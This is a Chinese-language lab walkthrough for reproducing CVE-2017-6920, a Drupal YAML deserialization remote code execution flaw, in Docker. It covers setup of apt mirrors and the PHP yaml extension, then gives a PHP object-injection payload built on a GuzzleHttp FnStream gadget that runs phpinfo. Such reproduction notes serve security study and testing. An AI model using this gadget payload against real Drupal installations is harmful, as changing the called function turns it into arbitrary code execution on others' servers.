漏洞描述

• 影响软件：Drupal
• 方式：反序列化
• 参考链接：CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造
• 效果：任意代码执行

漏洞环境及利用

搭建docker环境

环境启动后，访问 将会看到drupal的安装页面，一路默认配置下一步安装。 因为没有mysql环境，所以安装的时候可以选择sqlite数据库。

访问ip:8080

 

• 先安装 扩展yaml（在容器中！！！）

# 换镜像源，默认带vim编辑器，所以用cat换源，可以换成自己喜欢的源 
cd /etc/apt
这里官方提供的没有切换路径，需要自己切换以下，可以cat sources.list看有没有换源成功

cat << EOF > /etc/apt/sources.list
deb http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse
EOF
这里用阿里云的源，网易的失效了
#导入阿里源的公钥，否则下一步更新源会报错
apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3B4FE6ACC0B21F32 871920D1991BC93C
 # 安装依赖 
apt update 
apt-get -y install gcc make autoconf libc-dev pkg-config
 apt-get -y install libyaml-dev 
# 安装yaml扩展 
pecl install yaml 
docker-php-ext-enable yaml.so
 # 启用 yaml.decode_php 否则无法复现成功 echo 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini 
# 退出容器 exit
 # 重启容器，CONTAINER换成自己的容器ID docker restart CONTAINER

 

 payload

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

phpinfo成功执行，漏洞复现成功